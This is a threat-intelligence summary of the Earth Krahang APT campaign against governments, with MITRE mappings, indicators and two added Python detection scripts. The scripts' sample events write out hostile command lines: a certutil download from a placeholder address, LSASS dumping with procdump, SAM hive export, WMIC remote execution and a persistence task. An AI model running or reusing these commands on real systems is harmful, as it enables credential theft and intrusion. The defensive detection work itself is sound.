Earth Krahang Exploits Intergovernmental Trust to Launch Cross-Government Attacks

Earth Krahang is an APT intrusion set that targets government entities worldwide, abusing compromised government servers and email accounts to host payloads, proxy attacks, and relay spear-phishing. The actor uses web-scanning, CVE exploitation, brute-force of mail portals, SoftEther VPN deployment, and custom backdoors such as XDealer and RESHELL alongside Cobalt Strike. #EarthKrahang #EarthLusca #XDealer #RESHELL #CobaltStrike #PlugX #ShadowPad #I-Soon

Keypoints

  • Earth Krahang focuses on government targets globally, abusing compromised government infrastructure to host payloads and send spear-phishing from legitimate accounts.
  • Reconnaissance uses open-source scanners, recursive searches of .git/.idea, directory brute-forcing, and vulnerability scanners like sqlmap and nuclei to find exploitable servers.
  • Initial access is achieved via exploitation of public-facing applications (e.g., CVE-2023-32315, CVE-2022-21587) and spear-phishing attachments/links delivering backdoors.
  • Delivered tooling includes custom backdoors RESHELL and XDealer (Windows and Linux), Cobalt Strike (with RedGuard proxying), PlugX, and ShadowPad; XDealer often delivered via DLL loaders and LNK/installer chains.
  • Post-exploitation includes installing SoftEther VPN (via certutil), enabling RDP, persistence via scheduled tasks/services, credential theft (LSASS/SAM), network scanning (Fscan), and lateral movement (WMIC, remote services).
  • Email exfiltration performed by brute-forcing OWA/ActiveSync (custom Python scripts and ruler), and mailbox export from Zimbra using stolen authenticated cookies.
  • Evidence shows infrastructure overlap and lateral-stage connections with Earth Lusca; XDealer loaders were sometimes code-signed with abused GlobalSign certificates.

MITRE Techniques

  • [T1595.001] Active Scanning: Scanning IP Blocks – used to discover public-facing servers and scan targets (“scanning of public-facing servers”).
  • [T1595.002] Active Scanning: Vulnerability Scanning – used with tools like sqlmap, nuclei, xray to find exploitable web server vulnerabilities (“vulnerability scanning with tools like sqlmap, nuclei, xray…”).
  • [T1595.003] Active Scanning: Wordlist Scanning – used for recursive searches and wordlist/directory bruteforce to find sensitive files (“recursive searches of folders such as .git or .idea” and “brute-forcing directories”).
  • [T1592] Gather Victim Host Information – enumerating host files and paths to find credentials or config details (“identify files that may contain sensitive information such as file paths or passwords”).
  • [T1590] Gather Victim Network Information – examining subdomains and network exposure to locate unmaintained servers (“tend to examine the subdomains of their targets”).
  • [T1583.001] Acquire Infrastructure: Domains – acquiring/using domains to stage payloads and host C2 or download links (abuse of compromised government domains to host backdoors).
  • [T1583.003] Acquire Infrastructure: Virtual Private Server – using VPS or compromised servers to host tooling and VPNs (SoftEther installed on compromised public-facing servers).
  • [T1586.002] Compromise Accounts: Email Account – brute-forcing and hijacking government email accounts to send spear-phishing (“used a compromised mailbox from a government entity to send a malicious attachment”).
  • [T1584.004] Compromise Infrastructure: Server – exploiting public-facing servers and installing web shells/backdoors (“drop web shells, and install backdoors”).
  • [T1588.001] Obtain Capabilities: Malware – obtaining or developing custom backdoors like RESHELL and XDealer (“identified two unique malware families … RESHELL and XDealer”).
  • [T1588.003] Obtain Capabilities: Code Signing Certificates – abusing stolen code-signing certs to sign XDealer loaders (“signed with valid code signing certificates issued by GlobalSign”).
  • [T1608.001] Stage Capabilities: Upload Malware – hosting and uploading malware to compromised servers to serve targets (“compromised government webservers to host their backdoors”).
  • [T1608.002] Stage Capabilities: Upload Tool – uploading tools like SoftEther, Cobalt Strike components, and loaders to victim servers (“dropped PlugX and ShadowPad samples in victim environments”).
  • [T1608.005] Stage Capabilities: Link Target – crafting download links on legitimate government domains sent via spear-phishing (“send download links to other government entities via spear phishing emails”).
  • [T1190] Exploit Public-Facing Application – exploiting CVEs such as CVE-2023-32315 and CVE-2022-21587 to gain access to servers (“abused the following vulnerabilities multiple times”).
  • [T1566.001] Phishing: Spearphishing Attachment – sending RAR/LNK/EXE attachments that deploy backdoors (LNK deploying XDealer installer and opening a decoy document).
  • [T1566.002] Phishing: Spearphishing Link – sending links hosted on compromised government domains to download payloads (“malicious link uses a legitimate government domain”).
  • [T1199] Trusted Relationship – abusing trust between government entities by using their infrastructure and accounts to target peers (“abuses the trust between governments to conduct their attacks”).
  • [T1078] Valid Accounts – use of discovered or brute-forced credentials to log in and exfiltrate emails or send phishing (“likely discovered the weak credentials … using brute-forcing tools”).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – using certutil and scripting to download/install SoftEther and other tooling (use of certutil commands cited).
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – running system commands and installers as part of deployment and persistence activities.
  • [T1059.006] Command and Scripting Interpreter: Python – custom Python scripts used to send spear-phishing and to exfiltrate mailboxes (“The Python script used by Earth Krahang to send spear-phishing emails” and mailbox exfiltration scripts).
  • [T1203] Exploitation for Client Execution – LNKs and malicious documents used to trick users into executing backdoors (“RAR archive containing an LNK file that deployed the Xdealer malware”).
  • [T1569.002] System Services: Service Execution – installing services or running server components such as SoftEther renamed to tasklist.exe to appear legitimate (“SoftEther server executable is renamed to either taskllst.exe, tasklist.exe…”).
  • [T1204.002] User Execution: Malicious File – social engineering lures (geopolitical document names) to induce user execution (“backdoor filenames are usually related to geopolitical topics”).
  • [T1047] Windows Management Instrumentation – use of WMIC for lateral code execution (“Lateral code execution via WMIC”).
  • [T1543.003] Create or Modify System Process: Windows Service – persistence via services and task scheduling to maintain backdoors and VPN components (“Maintaining backdoor persistence with task scheduling” and service execution behaviors).
  • [T1133] External Remote Services – deploying SoftEther VPN and using external services to access internal networks (“build VPN servers on compromised public-facing servers to establish access into the private network”).
  • [T1053.005] Scheduled Task/Job: Scheduled Task – persistence via scheduled tasks to maintain active backdoors (“Maintaining backdoor persistence with task scheduling”).
  • [T1505.003] Server Software Component: Web Shell – deploying web shells on compromised servers to drop tools and backdoors (“deployed via web shell on compromised servers”).
  • [T1068] Exploitation for Privilege Escalation – exploiting local/Linux CVEs for privilege escalation (CVE-2021-4034, CVE-2021-22555, CVE-2016-5195 cited).
  • [T1078.003] Valid Accounts: Local Accounts – using local account credentials for privilege escalation and persistence (“Valid Accounts: Local Accounts”).
  • [T1140] Deobfuscate/Decode Files or Information – loaders and DLLs decode encrypted shellcode/C2 payloads (faultrep.dll decodes encoded shellcode stored in faultrep.dat).
  • [T1574.002] Hijack Execution Flow: DLL Side-Loading – side-loading DLLs (fontsets.exe + faultrep.dll) to load Cobalt Strike shellcode (“DLL side-loading vulnerability … fontsets.exe … side-load the DLL file faultrep.dll”).
  • [T1656] Impersonation – using legitimate-sounding filenames, email subjects, and government domains to impersonate trusted entities (geopolitical lure filenames and trusted government domains used in emails).
  • [T1036.005] Masquerading: Match Legitimate Name or Location – renaming executables (tasklist.exe, curl) to appear legitimate (“renamed to either taskllst.exe, tasklist.exe … or curl”).
  • [T1036.007] Masquerading: Double File Extension – using names like .doc.exe to trick users (“…Draft Cabinet status … .doc.exe” examples).
  • [T1112] Modify Registry – enabling RDP by modifying fDenyTSConnections in the registry (“Enabling Remote Desktop connections by modifying the Windows Registry “fDenyTSConnections””).
  • [T1110.003] Brute Force: Password Spraying – brute-force attacks against OWA/ActiveSync using common passwords and ruler/custom scripts (“brute force attacks on Exchange servers via their Outlook on the web portals”).
  • [T1003.001] OS Credential Dumping: LSASS Memory – dumping LSASS with Mimikatz or ProcDump to retrieve credentials (“Accessing credentials by dumping Local Security Authority Subsystem Service (LSASS) with Mimikatz or ProcDump”).
  • [T1003.002] OS Credential Dumping: Security Account Manager – dumping SAM database (HKLM/sam) to obtain credentials (“Accessing credentials by dumping the SAM database (HKLM/sam)”).
  • [T1539] Steal Web Session Cookie – use of authenticated cookies to export Zimbra mailboxes (“package the victim’s mailbox via the mail server API using an authenticated cookie stolen by the threat actor”).
  • [T1087.001] Account Discovery: Local Account – discovery of local accounts during reconnaissance and lateral exploration (“Account Discovery: Local Account”).
  • [T1087.002] Account Discovery: Domain Account – enumerating domain accounts to plan lateral movement (“Account Discovery: Domain Account”).
  • [T1069.002] Permission Groups Discovery: Domain Groups – discovery of domain groups to map permissions (“Permission Groups Discovery: Domain Groups”).
  • [T1057] Process Discovery – enumerating running processes during post-exploitation (“Process Discovery”).
  • [T1033] System Owner/User Discovery – identifying system owner/user context during discovery (“System Owner/User Discovery”).
  • [T1007] System Service Discovery – enumerating services to identify persistence opportunities (“System Service Discovery”).
  • [T1210] Exploitation of Remote Services – exploitation of remote services to move laterally (“Exploitation of Remote Services”).
  • [T1534] Internal Spearphishing – sending spear-phishing internally using compromised government accounts (“send spear-phishing emails to government-related targets using compromised government email accounts”).
  • [T1021.006] Remote Services: Windows Remote Management – use of remote management for lateral movement (“Remote Services: Windows Remote Management”).
  • [T1119] Automated Collection – automated harvesting and packaging of emails for exfiltration (“Automated Collection”).
  • [T1114] Email Collection – targeted email collection and mailbox export from Zimbra and Exchange (“Email Collection” and mailbox export scripts shown).
  • [T1071.001] Application Layer Protocol: Web Protocols – C2 over web protocols for backdoors and Cobalt Strike (“Application Layer Protocol: Web Protocols”).
  • [T1573] Encrypted Channel: Symmetric Cryptography – C2 communications encrypted with AES for RESHELL and others (“C&C communication is encrypted with the AES algorithm”).
  • [T1105] Ingress Tool Transfer – transferring tools and payloads into victim environments (“dropped PlugX and ShadowPad samples in victim environments”).
  • [T1572] Protocol Tunneling – installing SoftEther VPN to tunnel/proxy access into private networks (“build VPN servers on compromised public-facing servers”).
  • [T1020] Automated Exfiltration – automated exfiltration of mailboxes and data using scripts and tools (“The Python script used by Earth Krahang to exfiltrate the victim’s mailbox”).

Indicators of Compromise

  • [IP Address] lateral-stage download and C2 – 45.32.33.17, 207.148.75.122 (used to download malware and linked to Earth Lusca)
  • [Domain] infrastructure/hosting – googledatas[.]com (infrastructure overlap), and the report IOC list link (i.e., ioc_earth_krahang.txt)
  • [File Hash] Cobalt Strike side-load files – fontsets.exe SHA-1: 97c668912c29b8203a7c3bd7d5d690d5c4e5da53, faultrep.dll SHA-1: a94d0e51df6abbc4a7cfe84e36eb8f38bc011f46 (40-hex digests, i.e. SHA-1 length, not SHA-256)
  • [File Names] loader/side-load and payload artifacts – faultrep.dat, conf.data, RuntimeInit.exe, GoogleUpdate.exe (used in DLL side-loading and installer chains)
  • [CVE] exploited vulnerabilities – CVE-2023-32315 (OpenFire command execution), CVE-2022-21587 (Oracle Web Applications Desktop Integrator command execution)
  • [Certificate Hash] abused code-signing certs – be9de0d818b4096d80ce7d88110917b2a4e8273f, be31e841820586e9106407d78ae190915f2c012d (GlobalSign certs abused to sign XDealer loaders)

Earth Krahang’s technical procedure begins with extensive reconnaissance of public-facing infrastructure: recursive searches of developer folders (.git, .idea), directory brute-forcing, subdomain enumeration, and active vulnerability scanning using tools such as sqlmap, nuclei, xray, vscan, pocsuite, and wordpressscan to locate exploitable web servers and sensitive files. The actor repeatedly exploited known CVEs (e.g., CVE-2023-32315, CVE-2022-21587) and used discovered paths or web shells to upload backdoors and tools onto compromised servers.
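The reconnaissance described above, and the OWA/ActiveSync brute-forcing noted in the Keypoints, leave recognisable traces in an ordinary web server access log. The following Python script is an added example written for this summary, not code from the Trend Micro report or from the actor's tooling: it parses combined-format access log lines, flags probes of developer folders such as .git and .idea, bursts of 404s typical of wordlist directory brute-forcing, scanner User-Agents, and a single source trying many distinct mailboxes against the ActiveSync endpoint. The log lines are constructed (RFC 5737 addresses), the thresholds are illustrative, the .svn/.env prefixes are a small generalization beyond the paths the report names, and the User-Agent substrings assume the operator kept the scanner's default User-Agent.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Combined log format (Apache/Nginx style); the group names are ours.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Developer/config paths named in the report (.git, .idea) plus two common
# extras (.svn, .env) as a small generalization; matched on the URL path prefix.
SENSITIVE_PREFIXES = ("/.git/", "/.idea/", "/.svn/", "/.env")
# Substrings of the default User-Agents of scanners the report names
# (assumption: the operator did not override the tool's default UA).
SCANNER_UA_MARKERS = ("sqlmap", "nuclei", "xray")
# Exchange ActiveSync endpoint; its User= query parameter names the mailbox tried.
ACTIVESYNC_PATH = "/microsoft-server-activesync"


def parse(log_text):
    """Return one dict per well-formed log line; malformed lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ev = m.groupdict()
            ev["status"] = int(ev["status"])
            events.append(ev)
    return events


def analyze(log_text, brute_threshold=10, spray_threshold=5):
    """Return (rule, source_ip, detail) tuples. Thresholds are illustrative."""
    findings = []
    not_found = defaultdict(int)      # 404 count per source IP
    tried_users = defaultdict(set)    # distinct ActiveSync users rejected (401) per IP
    for ev in parse(log_text):
        ip, status = ev["ip"], ev["status"]
        parts = urlsplit(ev["target"])
        path = parts.path.lower()
        if path.startswith(SENSITIVE_PREFIXES):
            findings.append(("sensitive_path_probe", ip, parts.path))
        if any(marker in ev["ua"].lower() for marker in SCANNER_UA_MARKERS):
            findings.append(("scanner_user_agent", ip, ev["ua"]))
        if status == 404:
            not_found[ip] += 1
        if path == ACTIVESYNC_PATH and status == 401:
            user = parse_qs(parts.query).get("User", [""])[0]
            if user:
                tried_users[ip].add(user.lower())
    for ip, count in not_found.items():
        if count >= brute_threshold:
            findings.append(("directory_bruteforce", ip, count))
    for ip, users in tried_users.items():
        if len(users) >= spray_threshold:
            findings.append(("activesync_password_spray", ip, len(users)))
    return findings


# ---- constructed sample log (documentation-range addresses, not real traffic) ----
_LINE = '{ip} - - [10/Mar/2024:{t} +0000] "{m} {target} HTTP/1.1" {s} 0 "-" "{ua}"'
_UA = "Mozilla/5.0"
_NUCLEI_UA = "Mozilla/5.0 (compatible; Nuclei - Open-source project)"
SAMPLE_LOG = "\n".join(
    [
        _LINE.format(ip="203.0.113.10", t="08:00:01", m="GET", target="/.git/HEAD", s=200, ua=_UA),
        _LINE.format(ip="203.0.113.10", t="08:00:02", m="GET", target="/.git/config", s=200, ua=_UA),
        _LINE.format(ip="203.0.113.10", t="08:00:03", m="GET", target="/.idea/workspace.xml", s=404, ua=_UA),
        _LINE.format(ip="203.0.113.11", t="08:01:00", m="GET", target="/admin/", s=404, ua=_NUCLEI_UA),
    ]
    # wordlist-style directory brute force: a burst of 404s from one address
    + [
        _LINE.format(ip="203.0.113.11", t=f"08:01:{i + 1:02d}", m="GET", target=f"/{d}/", s=404, ua=_UA)
        for i, d in enumerate(["backup", "old", "test", "dev", "config", "upload",
                               "tmp", "private", "api", "db", "logs", "data"])
    ]
    # ActiveSync password spraying: many mailboxes, one source, every attempt rejected
    + [
        _LINE.format(ip="198.51.100.7", t=f"09:00:{i:02d}", m="POST",
                     target=f"/Microsoft-Server-ActiveSync?User={u}&DeviceId=ABCD1&DeviceType=iPhone&Cmd=Sync",
                     s=401, ua="Apple-iPhone/1")
        for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "alice"])
    ]
    + [_LINE.format(ip="192.0.2.5", t="09:05:00", m="GET", target="/index.html", s=200, ua=_UA)]
)

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(*finding)
```

In production the same logic is more useful as a per-source sliding window than as a whole-file count, and the 404-burst rule should be tuned against the site's normal broken-link rate; the ActiveSync rule is the one worth keeping strict, since a single address cycling through distinct `User=` values with only 401 responses has no benign explanation.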

For initial access and delivery, Earth Krahang used spear-phishing attachments and links with geopolitical lures and leveraged compromised government domains and email accounts to increase trust. Delivered tooling included RESHELL (.NET backdoor packed with ConfuserEX and AES-encrypted C2), XDealer (Windows/Linux DLL-based backdoor with stealer modules delivered via LNK/installer chains), Cobalt Strike (deployed via DLL side-loading loaders such as fontsets.exe + faultrep.dll + faultrep.dat), PlugX, and ShadowPad; some XDealer loaders were signed with abused GlobalSign certificates to evade detection.

Post-exploitation actions focused on establishing sustained, covert access and harvesting credentials. The actor installed SoftEther VPN (downloaded via certutil and renamed to tasklist.exe or curl) to tunnel into internal networks, enabled RDP by modifying fDenyTSConnections, established persistence via scheduled tasks and services, dumped credentials from LSASS or the SAM database with Mimikatz or ProcDump, scanned and moved laterally using Fscan, WMIC and remote services, and exfiltrated mailboxes using custom Python scripts and tools (ActiveSync brute-force, ruler, and Zimbra mailbox export via stolen authenticated cookies). Read more: https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html
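The delivery chain described earlier (fontsets.exe side-loading faultrep.dll) and the post-exploitation commands in this paragraph each map to a simple endpoint telemetry rule. The following Python is an added example written for this summary, not code from the report or from any vendor product: it evaluates Sysmon-style process-creation, image-load and registry-value events against rules for certutil downloads, a SoftEther binary masquerading under a system tool name outside System32, the fDenyTSConnections change, LSASS and SAM dumping, scheduled tasks pointing at user-writable paths, remote process creation via WMIC, and a system DLL name loaded from the executable's own directory. The events are constructed; the field names (Image, CommandLine, ImageLoaded, TargetObject, Details) follow Sysmon's naming, and the 203.0.113.20 address, 10.0.0.25 host and file paths are placeholders.

```python
import ntpath

# Directories where the Windows tools below legitimately live (lower-case).
SYSTEM_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64",
               "c:\\windows\\system32\\wbem")
# Legitimate tool names the report says the SoftEther server binary was renamed to.
MASQUERADE_NAMES = {"tasklist.exe", "taskllst.exe", "curl.exe"}
# System DLL names seen side-loaded in the report (faultrep.dll beside fontsets.exe).
SIDELOAD_DLLS = {"faultrep.dll"}


def _name(p):
    return ntpath.basename(p).lower()


def _dir(p):
    return ntpath.dirname(p).lower()


def _system_path(p):
    return _dir(p) in SYSTEM_DIRS


def rule_process(ev):
    """Heuristics over one process-creation event; returns a rule name or None."""
    img, cmd = _name(ev["Image"]), ev.get("CommandLine", "").lower()
    if img == "certutil.exe" and "urlcache" in cmd and "http" in cmd:
        return "certutil_download"
    if img in MASQUERADE_NAMES and not _system_path(ev["Image"]):
        return "masquerading_system_tool_name"
    if img == "reg.exe" and "fdenytsconnections" in cmd and "/d 0" in cmd:
        return "rdp_enabled_via_registry"
    if "lsass" in cmd and (img.startswith("procdump") or "sekurlsa" in cmd):
        return "lsass_credential_dump"
    if img == "reg.exe" and " save " in cmd and "hklm\\sam" in cmd:
        return "sam_hive_dump"
    if img == "schtasks.exe" and "/create" in cmd and ("\\programdata\\" in cmd or "\\users\\" in cmd):
        return "scheduled_task_from_user_writable_path"
    if img == "wmic.exe" and "/node:" in cmd and "process call create" in cmd:
        return "wmic_remote_process_create"
    return None


def rule_image_load(ev):
    """A system DLL name loaded from the EXE's own non-system directory: side-loading."""
    dll = ev["ImageLoaded"]
    if _name(dll) in SIDELOAD_DLLS and not _system_path(dll) and _dir(dll) == _dir(ev["Image"]):
        return "dll_sideload"
    return None


def rule_registry(ev):
    """fDenyTSConnections set to 0 (RDP enabled); Details uses Sysmon's DWORD rendering."""
    if (ev["TargetObject"].lower().endswith("\\terminal server\\fdenytsconnections")
            and ev.get("Details") == "DWORD (0x00000000)"):
        return "rdp_enabled_via_registry"
    return None


RULES = {"ProcessCreate": rule_process, "ImageLoad": rule_image_load,
         "RegistryValueSet": rule_registry}


def evaluate(events):
    """Return (rule_name, image_path) for every event a rule matches."""
    findings = []
    for ev in events:
        rule = RULES.get(ev["EventType"])
        hit = rule(ev) if rule else None
        if hit:
            findings.append((hit, ev["Image"]))
    return findings


# ---- constructed sample telemetry (placeholder addresses and paths) ----
_S32 = r"C:\Windows\System32"
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "Image": _S32 + r"\certutil.exe",
     "CommandLine": r"certutil -urlcache -split -f http://203.0.113.20/vpn.zip C:\ProgramData\vpn\vpn.zip"},
    {"EventType": "ProcessCreate", "Image": r"C:\ProgramData\vpn\tasklist.exe", "CommandLine": "tasklist.exe"},
    {"EventType": "ProcessCreate", "Image": _S32 + r"\reg.exe",
     "CommandLine": r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    {"EventType": "RegistryValueSet", "Image": _S32 + r"\reg.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "Details": "DWORD (0x00000000)"},
    {"EventType": "ProcessCreate", "Image": r"C:\Users\Public\procdump64.exe",
     "CommandLine": r"procdump64.exe -accepteula -ma lsass.exe C:\Users\Public\l.dmp"},
    {"EventType": "ProcessCreate", "Image": _S32 + r"\reg.exe",
     "CommandLine": r"reg save hklm\sam C:\Users\Public\sam.hiv"},
    {"EventType": "ProcessCreate", "Image": _S32 + r"\schtasks.exe",
     "CommandLine": r"schtasks /create /tn VpnSvc /sc onstart /ru SYSTEM /tr C:\ProgramData\vpn\tasklist.exe"},
    {"EventType": "ProcessCreate", "Image": _S32 + r"\wbem\WMIC.exe",
     "CommandLine": r'wmic /node:10.0.0.25 process call create "cmd.exe /c whoami"'},
    {"EventType": "ImageLoad", "Image": r"C:\Users\Public\fontsets.exe",
     "ImageLoaded": r"C:\Users\Public\faultrep.dll"},
    # benign controls: the real tasklist, and the real faultrep.dll loaded from System32
    {"EventType": "ProcessCreate", "Image": _S32 + r"\tasklist.exe", "CommandLine": "tasklist /v"},
    {"EventType": "ImageLoad", "Image": _S32 + r"\notepad.exe", "ImageLoaded": _S32 + r"\faultrep.dll"},
]

if __name__ == "__main__":
    for finding in evaluate(SAMPLE_EVENTS):
        print(*finding)
```

The masquerading rule is deliberately path-based rather than hash-based: a renamed SoftEther binary has an unpredictable hash, but tasklist.exe running from ProgramData or a user profile is anomalous on its own, and the two benign control events show that the real tool in System32 and the real faultrep.dll under System32 produce no findings.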